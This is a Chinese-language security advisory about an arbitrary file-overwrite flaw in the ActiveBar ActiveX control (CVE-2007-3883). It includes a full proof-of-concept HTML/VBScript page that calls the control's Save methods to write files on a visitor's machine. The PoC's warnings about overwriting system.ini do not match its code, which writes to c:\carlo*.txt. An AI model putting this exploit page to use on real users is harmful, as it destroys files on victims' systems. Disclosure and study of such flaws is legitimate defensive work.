发布日期：2007-07-18
更新日期：2007-07-23

受影响系统：

Data Dynamics ActiveBar ActiveX <= 3.1

描述：

---

BUGTRAQ  ID: 24959
CVE(CAN) ID: CVE-2007-3883,CVE-2011-1207

ActiveBar控件用于生成Microsoft Office和Visual Studio的工具条、菜单以及仿真的windows界面。

ActiveBar控件实现上存在漏洞，远程攻击者可能利用此漏洞破坏系统上的任意文件。

ActiveBar的ActiveBar3Library.ActiveBar3.3（actbar.ocx）控件中的Save()、SaveLayoutChanges()和SaveMenuUsageData()方式不安全地将指定参数写入到文件，如果用户受骗访问了恶意站点的话，就可能导致覆盖并破坏系统上的任意文件。

<*来源：shinnai （shinnai@autistici.org）
  
  链接：http://secunia.com/advisories/26098/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">---------------------------------------------------------------------------------------
<b>Data Dynamics ActiveBar ActiveX Control (actbar3.ocx <= 3.1) Multiple Inscure Methods</b>
url: http://www.datadynamics.com/default.aspx

author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

This was written for educational purpose. Use it at your own risk.
Author will be not be responsible for any damage.

<b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b>

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to this exploits.

<b>This control is marked as:
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
KillBitSet: False</b>
---------------------------------------------------------------------------------------

<object classid='clsid:5407153D-022F-4CD2-8BFF-465569BC5DB8' id='test'></object>

<select style="width: 404px" name="Pucca">
  <option value = "Save">Save</option>
  <option value = "SaveLayoutChanges">SaveLayoutChanges</option>
  <option value = "SaveMenuUsageData">SaveMenuUsageData</option>
</select>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
Sub tryMe
  on error resume next
   Dim MyMsg
   if Pucca.value = "Save" then
    test.Save "", "c:\carlo1.txt", 1
    MyMsg = MsgBox("Ok, now check your system.ini file")
   elseif Pucca.value = "SaveLayoutChanges" then
    test.SaveLayoutChanges "c:\carlo2.txt", 1
    MyMsg = MsgBox("Ok, now check your system.ini file")
   elseif Pucca.value = "SaveMenuUsageData" then
    test.SaveMenuUsageData "c:\carlo3.txt", 1
    MyMsg = MsgBox("Ok, now check your system.ini file")
   end if

End Sub
</script>

</span></span>
</code></pre>

建议：

---

厂商补丁：

Data Dynamics
-------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.datadynamics.com/default.aspx

浏览次数：2868
严重程度：0（网友投票）